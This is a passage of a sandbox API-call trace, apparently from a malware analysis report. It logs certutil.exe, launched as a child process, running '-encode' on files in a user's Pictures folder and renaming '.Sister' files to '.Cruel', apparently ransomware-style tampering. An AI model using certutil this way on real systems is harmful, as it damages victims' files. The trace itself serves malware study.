"c:\\users\\fd1hvy\\pictures\\cbqe_ptifcfixokq.gif.cruel"), fInfoLevelId=0x0, lpFileInformation=0x3f4493f030 | out: lpFileInformation=0x3f4493f030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdabe33e0, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xdabe33e0, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdabf1c95, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x15bc)) returned 1 [0295.510] _vsnwprintf (in: _Buffer=0x3f4493f038, _BufferCount=0xb, _Format="%d", _ArgList=0x3f4493f028 | out: _Buffer="361") returned 3 [0295.510] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x3f4493edf0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0295.510] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x22f955a0c50 [0295.510] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0295.510] _vsnwprintf (in: _Buffer=0x3f4493e020, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x3f4493f078 | out: _Buffer="Output Length = 5564") returned 20 [0295.510] GetFileType (hFile=0x50) returned 0x2 [0295.510] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3f4493e020*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x3f4493dfd4, lpReserved=0x0 | out: lpBuffer=0x3f4493e020*, lpNumberOfCharsWritten=0x3f4493dfd4*=0x14) returned 1 [0295.511] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0295.511] _vsnwprintf (in: _Buffer=0x3f4493e020, _BufferCount=0x1ff, _Format="\n", _ArgList=0x3f4493f078 | out: _Buffer="\n") returned 1 [0295.511] GetFileType (hFile=0x50) returned 0x2 [0295.511] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3f4493e020*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x3f4493dfd4, lpReserved=0x0 | out: lpBuffer=0x3f4493e020*, lpNumberOfCharsWritten=0x3f4493dfd4*=0x1) returned 1 [0295.516] LocalFree (hMem=0x22f955a1230) returned 0x0 [0295.516] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0295.516] _vsnwprintf (in: _Buffer=0x3f4493f098, _BufferCount=0xb, _Format="%d", _ArgList=0x3f4493f088 | out: _Buffer="2022") returned 4 [0295.516] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x3f4493ee50, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0295.516] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x22f95579d40 [0295.516] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0295.516] _vsnwprintf (in: _Buffer=0x3f4493e080, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x3f4493f0d8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0295.516] GetFileType (hFile=0x50) returned 0x2 [0295.516] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3f4493e080*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x3f4493e034, lpReserved=0x0 | out: lpBuffer=0x3f4493e080*, lpNumberOfCharsWritten=0x3f4493e034*=0x31) returned 1 [0295.517] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0295.517] _vsnwprintf (in: _Buffer=0x3f4493e080, _BufferCount=0x1ff, _Format="\n", _ArgList=0x3f4493f0d8 | out: _Buffer="\n") returned 1 [0295.517] GetFileType (hFile=0x50) returned 0x2 [0295.517] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3f4493e080*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x3f4493e034, lpReserved=0x0 | out: lpBuffer=0x3f4493e080*, lpNumberOfCharsWritten=0x3f4493e034*=0x1) returned 1 [0295.524] LocalFree (hMem=0x0) returned 0x0 [0295.524] LocalFree (hMem=0x22f9557aed0) returned 0x0 [0295.524] LocalFree (hMem=0x22f95574430) returned 0x0 [0295.524] SetLastError (dwErrCode=0x80070716) [0295.524] _vsnwprintf (in: _Buffer=0x3f4493f108, _BufferCount=0xb, _Format="%d", _ArgList=0x3f4493f0f8 | out: _Buffer="511") returned 3 [0295.524] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x3f4493eec0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0295.524] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x22f955a0e00 [0295.525] PostQuitMessage (nExitCode=0) [0295.525] GetMessageW (in: lpMsg=0x3f4493f700, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3f4493f700) returned 0 [0295.525] LocalFree (hMem=0x22f9558b570) returned 0x0 [0295.525] LocalFree (hMem=0x22f955a1010) returned 0x0 [0295.525] LocalFree (hMem=0x0) returned 0x0 [0295.525] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0295.526] GetLastError () returned 0x7e [0295.526] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0295.526] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0295.526] DllMain () returned 0x1 [0295.526] LocalFree (hMem=0x22f9558b730) returned 0x0 [0295.526] LocalFree (hMem=0x22f95595200) returned 0x0 [0295.526] LocalFree (hMem=0x22f955a0c80) returned 0x0 [0295.526] LocalFree (hMem=0x22f955a0c50) returned 0x0 [0295.526] LocalFree (hMem=0x22f95579d40) returned 0x0 [0295.526] LocalFree (hMem=0x22f955a0e00) returned 0x0 [0295.526] LocalFree (hMem=0x22f9557cda0) returned 0x0 [0295.526] LocalFree (hMem=0x22f9557c7c0) returned 0x0 [0295.527] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0295.527] GetLastError () returned 0x7e [0295.527] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0295.527] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0295.527] DllMain () returned 0x1 [0295.527] exit (_Code=0) Thread: id = 114 os_tid = 0xd9c Process: id = "44" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x26890000" os_pid = "0x760" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"Cm2WieoPB7gN.png.Sister\" \"Cm2WieoPB7gN.png.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Pictures\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 115 os_tid = 0xe28 [0296.066] GetStartupInfoW (in: lpStartupInfo=0x695bb6feb0 | out: lpStartupInfo=0x695bb6feb0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"Cm2WieoPB7gN.png.Sister\" \"Cm2WieoPB7gN.png.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0296.073] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0296.073] __set_app_type (_Type=0x1) [0296.073] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0296.073] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0296.076] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0296.076] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0296.077] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0296.077] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0296.077] WerSetFlags () returned 0x0 [0296.078] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0296.078] __iob_func () returned 0x7ffcea2dea00 [0296.078] _fileno (_File=0x7ffcea2dea30) returned 1 [0296.078] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0296.078] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0296.079] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0296.080] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0296.080] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0296.080] GetConsoleOutputCP () returned 0x1b5 [0296.086] _vsnwprintf (in: _Buffer=0x695bb6fe20, _BufferCount=0xb, _Format=".%d", _ArgList=0x695bb6fd48 | out: _Buffer=".437") returned 4 [0296.086] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0296.086] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.086] GetFileType (hFile=0x50) returned 0x2 [0296.086] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0296.086] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0296.086] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.087] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0296.087] GetCommandLineW () returned="certutil -encode \"Cm2WieoPB7gN.png.Sister\" \"Cm2WieoPB7gN.png.Cruel\"" [0296.087] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x18393dcb460 [0296.087] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x18393dd4c20 [0296.087] LocalFree (hMem=0x18393dcb460) returned 0x0 [0296.087] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x18393dd4dd0 [0296.087] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x18393dd4e00 [0296.087] LocalFree (hMem=0x18393dd4dd0) returned 0x0 [0296.087] LocalFree (hMem=0x18393dd4c20) returned 0x0 [0296.087] LocalFree (hMem=0x0) returned 0x0 [0296.088] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0296.088] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0296.088] GetCommandLineW () returned="certutil -encode \"Cm2WieoPB7gN.png.Sister\" \"Cm2WieoPB7gN.png.Cruel\"" [0296.088] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x18393dcb960 [0296.088] GetSystemTime (in: lpSystemTime=0x695bb6fb10 | out: lpSystemTime=0x695bb6fb10*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0xa, wMilliseconds=0x26a)) [0296.089] SystemTimeToFileTime (in: lpSystemTime=0x695bb6fb10, lpFileTime=0x695bb6fb08 | out: lpFileTime=0x695bb6fb08) returned 1 [0296.089] FileTimeToLocalFileTime (in: lpFileTime=0x695bb6fb08, lpLocalFileTime=0x695bb6fad0 | out: lpLocalFileTime=0x695bb6fad0) returned 1 [0296.089] FileTimeToSystemTime (in: lpFileTime=0x695bb6fad0, lpSystemTime=0x695bb6f840 | out: lpSystemTime=0x695bb6f840) returned 1 [0296.089] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x695bb6f840, lpFormat=0x0, lpDateStr=0x695bb6f950, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0296.089] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x695bb6f840, lpFormat=0x0, lpTimeStr=0x695bb6f850, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0296.089] _vsnwprintf (in: _Buffer=0x695bb6f85e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x695bb6f828 | out: _Buffer=" 10.618s") returned 8 [0296.089] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x18393dce0a0 [0296.089] SetLastError (dwErrCode=0x80070716) [0296.089] _vsnwprintf (in: _Buffer=0x695bb6f8d8, _BufferCount=0xb, _Format="%d", _ArgList=0x695bb6f8c8 | out: _Buffer="948") returned 3 [0296.089] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x695bb6f690, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0296.089] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x18393dcb380 [0296.090] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x18393dd53b0 [0296.090] LocalFree (hMem=0x18393dce0a0) returned 0x0 [0296.090] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x695bb6fb80 | out: lpSystemTimeAsFileTime=0x695bb6fb80*(dwLowDateTime=0xdb15c42f, dwHighDateTime=0x1d6141f)) [0296.090] GetLocalTime (in: lpSystemTime=0x695bb6fbb8 | out: lpSystemTime=0x695bb6fbb8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0xa, wMilliseconds=0x26a)) [0296.090] SystemTimeToFileTime (in: lpSystemTime=0x695bb6fbb8, lpFileTime=0x695bb6fb90 | out: lpFileTime=0x695bb6fb90) returned 1 [0296.090] CompareFileTime (lpFileTime1=0x695bb6fb90, lpFileTime2=0x695bb6fb80) returned 1 [0296.090] _vsnwprintf (in: _Buffer=0x695bb6fbc8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x695bb6fb58 | out: _Buffer="GMT + 2.00") returned 10 [0296.090] LocalFree (hMem=0x18393dcb960) returned 0x0 [0296.091] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0296.091] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0296.091] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0296.091] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0296.091] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0296.091] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x695bb6fbf8 | out: _Buffer="10.0.15063.447") returned 14 [0296.091] GetACP () returned 0x4e4 [0296.091] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0296.091] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x18393dcb3c0 [0296.091] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x18393dcb3c0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0296.091] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x18393dcde60 [0296.091] _vsnwprintf (in: _Buffer=0x18393dcde60, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x695bb6fc48 | out: _Buffer="10.0.15063.447 retail") returned 21 [0296.091] LocalFree (hMem=0x18393dcb3c0) returned 0x0 [0296.091] LocalFree (hMem=0x0) returned 0x0 [0296.092] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0296.092] GetACP () returned 0x4e4 [0296.092] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0296.092] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x18393dcb280 [0296.092] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x18393dcb280, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0296.092] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x18393dcdde0 [0296.092] _vsnwprintf (in: _Buffer=0x18393dcdde0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x695bb6fc48 | out: _Buffer="10.0.15063.447 retail") returned 21 [0296.092] LocalFree (hMem=0x18393dcb280) returned 0x0 [0296.092] LocalFree (hMem=0x0) returned 0x0 [0296.092] GetACP () returned 0x4e4 [0296.092] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0296.092] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x18393dcba00 [0296.092] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x18393dcba00, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0296.092] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x18393dcdfe0 [0296.092] _vsnwprintf (in: _Buffer=0x18393dcdfe0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x695bb6fc78 | out: _Buffer="10.0.15063.447 retail") returned 21 [0296.092] LocalFree (hMem=0x18393dcba00) returned 0x0 [0296.092] LocalFree (hMem=0x18393dcde60) returned 0x0 [0296.092] LocalFree (hMem=0x18393dcdde0) returned 0x0 [0296.092] LocalFree (hMem=0x18393dcdfe0) returned 0x0 [0296.092] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0296.093] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0296.093] GetStockObject (i=0) returned 0x900010 [0296.093] RegisterClassW (lpWndClass=0x695bb6fda0) returned 0xc1a2 [0296.093] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1602c6 [0296.122] NtdllDefWindowProc_W () returned 0x0 [0296.122] NtdllDefWindowProc_W () returned 0x1 [0296.129] NtdllDefWindowProc_W () returned 0x0 [0296.144] UpdateWindow (hWnd=0x1602c6) returned 1 [0296.144] PostMessageW (hWnd=0x1602c6, Msg=0x400, wParam=0x0, lParam=0x18393db217e) returned 1 [0296.144] GetMessageW (in: lpMsg=0x695bb6fdf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x695bb6fdf0) returned 1 [0296.144] TranslateMessage (lpMsg=0x695bb6fdf0) returned 0 [0296.144] DispatchMessageW (lpMsg=0x695bb6fdf0) returned 0x0 [0296.144] NtdllDefWindowProc_W () returned 0x0 [0296.144] GetMessageW (in: lpMsg=0x695bb6fdf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x695bb6fdf0) returned 1 [0296.144] TranslateMessage (lpMsg=0x695bb6fdf0) returned 0 [0296.144] DispatchMessageW (lpMsg=0x695bb6fdf0) returned 0x0 [0296.144] LocalAlloc (uFlags=0x0, uBytes=0x76) returned 0x18393dc4c00 [0296.146] LocalAlloc (uFlags=0x0, uBytes=0x82) returned 0x18393db4400 [0296.146] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0296.146] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0296.146] SetLastError (dwErrCode=0x80070716) [0296.146] _vsnwprintf (in: _Buffer=0x695bb6f7f8, _BufferCount=0xb, _Format="%d", _ArgList=0x695bb6f7e8 | out: _Buffer="465") returned 3 [0296.146] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x695bb6f5b0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0296.146] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x18393dd4bf0 [0296.146] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0296.146] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0296.149] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x695bb6f590, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0296.149] GetLastError () returned 0xcb [0296.149] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0296.149] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0296.149] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0296.149] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0296.149] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0296.149] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0296.149] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0296.149] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0296.149] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0296.149] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0296.149] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0296.149] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0296.149] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0296.149] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0296.151] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0296.151] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0296.151] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0296.151] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0296.151] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0296.151] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0296.151] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0296.151] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x695bb6f258 | out: phkResult=0x695bb6f258*=0x23c) returned 0x0 [0296.151] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x18393db8540 [0296.151] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x695bb6f7c8, lpData=0x695bb6f7f8, lpcbData=0x695bb6f7c0*=0x4 | out: lpType=0x695bb6f7c8*=0x0, lpData=0x695bb6f7f8*=0x0, lpcbData=0x695bb6f7c0*=0x4) returned 0x2 [0296.151] LocalFree (hMem=0x18393db8540) returned 0x0 [0296.151] RegCloseKey (hKey=0x23c) returned 0x0 [0296.151] LocalFree (hMem=0x0) returned 0x0 [0296.153] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x18393ddddc0 [0296.193] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0296.193] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0296.193] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0296.193] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0296.193] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0296.193] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0296.193] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0296.193] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0296.193] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0296.193] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0296.193] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0296.194] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0296.194] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0296.194] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0296.194] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0296.194] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0296.194] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x18393de33b0 [0296.194] GetComputerNameW (in: lpBuffer=0x18393de33b0, nSize=0x695bb6f7c0 | out: lpBuffer="NQDPDE", nSize=0x695bb6f7c0) returned 1 [0296.194] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x695bb6f790 | out: lpBuffer=0x0, nSize=0x695bb6f790) returned 0 [0296.195] GetLastError () returned 0xea [0296.195] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x18393dcb820 [0296.195] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x18393dcb820, nSize=0x695bb6f790 | out: lpBuffer="NQdPdE", nSize=0x695bb6f790) returned 1 [0296.195] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0296.199] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x18393de3780, cbCertEncoded=0xe23a) returned 0x0 [0296.203] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x18393de3780, cbCrlEncoded=0xe23a) returned 0x0 [0296.204] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x18393de3780, cbEncoded=0xe23a, dwFlags=0x8000, pDecodePara=0x695bb6f670, pvStructInfo=0x695bb6f700, pcbStructInfo=0x695bb6f6f4 | out: pvStructInfo=0x695bb6f700, pcbStructInfo=0x695bb6f6f4) returned 0 [0296.205] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x18393de3780, cbEncoded=0xe23a, dwFlags=0x8000, pDecodePara=0x695bb6f670, pvStructInfo=0x695bb6f700, pcbStructInfo=0x695bb6f6f4 | out: pvStructInfo=0x695bb6f700, pcbStructInfo=0x695bb6f6f4) returned 0 [0296.205] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x18393de3780, cbEncoded=0xe23a, dwFlags=0x8000, pDecodePara=0x695bb6f670, pvStructInfo=0x695bb6f700, pcbStructInfo=0x695bb6f6f4 | out: pvStructInfo=0x695bb6f700, pcbStructInfo=0x695bb6f6f4) returned 0 [0296.205] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, 